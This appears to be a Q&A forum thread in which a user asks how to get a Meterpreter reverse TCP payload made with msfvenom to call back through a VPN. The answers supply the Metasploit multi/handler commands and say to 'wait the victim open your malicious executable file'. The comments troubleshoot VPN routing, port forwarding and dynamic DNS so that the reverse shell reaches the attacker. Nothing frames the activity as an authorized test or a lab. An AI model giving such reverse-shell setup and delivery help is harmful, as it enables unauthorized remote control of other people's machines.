5

I have the following situation:

Attacker machine connected to a router with public IP assigned from ISP, forwarding enabled.

Victim machine connected to another router, (obviously) different IP assigned from different ISP.

I want establish a meterpreter session with reverse tcp. I create payload executable with msfvenom giving public IP of attacker router as LHOST parameter, then I start the listener setting the local IP of attacker machine as LHOST.

Till here no problem.

I tried to do the same with the attacker machine connected to a self made VPN server with no success. Is possible to do this?

If so, which IP addresses I have to set both in payload and in listener to get it working?

MKay
  • 153
  • 1
  • 1
  • 5

2 Answers2

3

If you are using a reverse shell, you need to set LHOST with the attacker VPN IP, not your internal LAN IP. Also you need to listen locally with Metasploit to a specific port that you should set on LPORT and must be the same of msfvenom (es. 443). To achieve this you can use:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_vpn_ip
set LPORT your_local_port
exploit

Then just wait the victim open your malicious executable file

  • Ok, and what about LHOST in msfvenom? I've tried using VPN public IP with no success. – MKay Apr 02 '16 at 11:03
  • Are you sure that the victim machine can connects to your VPN? Try to ping your VPN IP, is it reachable? –  Apr 02 '16 at 11:11
  • Effectively ping from victim to VPN does not work, but I can connect to VPN from every IP address. why? – MKay Apr 02 '16 at 11:21
  • I think it's a firewall problem. Try to disable it on VPN server, ping again the VPN, if it works you need to set a rule into VPN machine firewall –  Apr 02 '16 at 11:26
  • Disabled the firewall, I can ping the server but exploit still doesn't work. I can't figure out the issue. – MKay Apr 02 '16 at 12:44
  • Wait, is your victim machine connected to VPN? –  Apr 02 '16 at 12:48
  • No, it isn't. Should it be? – MKay Apr 02 '16 at 12:50
  • 1
    Yes because VPN can connect your machine into a remote LAN, if you use your VPN IP into the LHOST parameter you need to connect your victim machine into the same VPN. With this method you have 2 machine connected into a sort of LAN –  Apr 02 '16 at 12:52
  • So, I was mistaken everything. I was using public VPN IP as LHOST for the msfvenom created payload, but the victim machine was on a different LAN. Is there any way to do this? In every case, I'll flag the answer as accepted,thank you very much. – MKay Apr 02 '16 at 12:59
  • If you want to use your VPN IP, the attacker and victim machine must be on the same VPN, or you can connect to the victim LAN with a VPN or viceversa. The important thing is that the machines must be on the same network if you use a VPN. –  Apr 02 '16 at 13:02
  • I have the same issue. I can ping the listening machine(attacker) from the target machine using the public VPN ip of the attacker. But when I check using canyouseeme.org, I cant see the listening port. I use vpnbook.com and it claims that it doesn't block any port. Just to be sure, I should use the internal ip of the VPN as the LHOST for listener, right? – wishchaser Feb 13 '17 at 17:26
  • @Cricco95 Supposedly my ISP does not provide me static IP and I can not use VPN because the attacker will have to connect to VPN first. Is there any alternative to his? – neferpitou Jun 17 '17 at 22:53
  • @user666887 You can just find your public IP and use it as LHOST. Then open a port on your router and forward it to your private IP machine. –  Jun 17 '17 at 23:20
  • @Cricco95 I do understand that but if I use net for a long time IP address changes every 2-3hrs at max. So is there anything else I could use. – neferpitou Jun 18 '17 at 00:17
  • @user666887 You can use a DDNS –  Jun 18 '17 at 11:21
0

Yes it is possible if you are using openvpn. You could setup a dmz. Openvpn has the capability's to do it. A vpn public ip can forward ports to its clients if configured with dmz. You should set the IP of your VPN and not your internal client ip as LHOST

Tim Jonas
  • 807
  • 1
  • 7
  • 19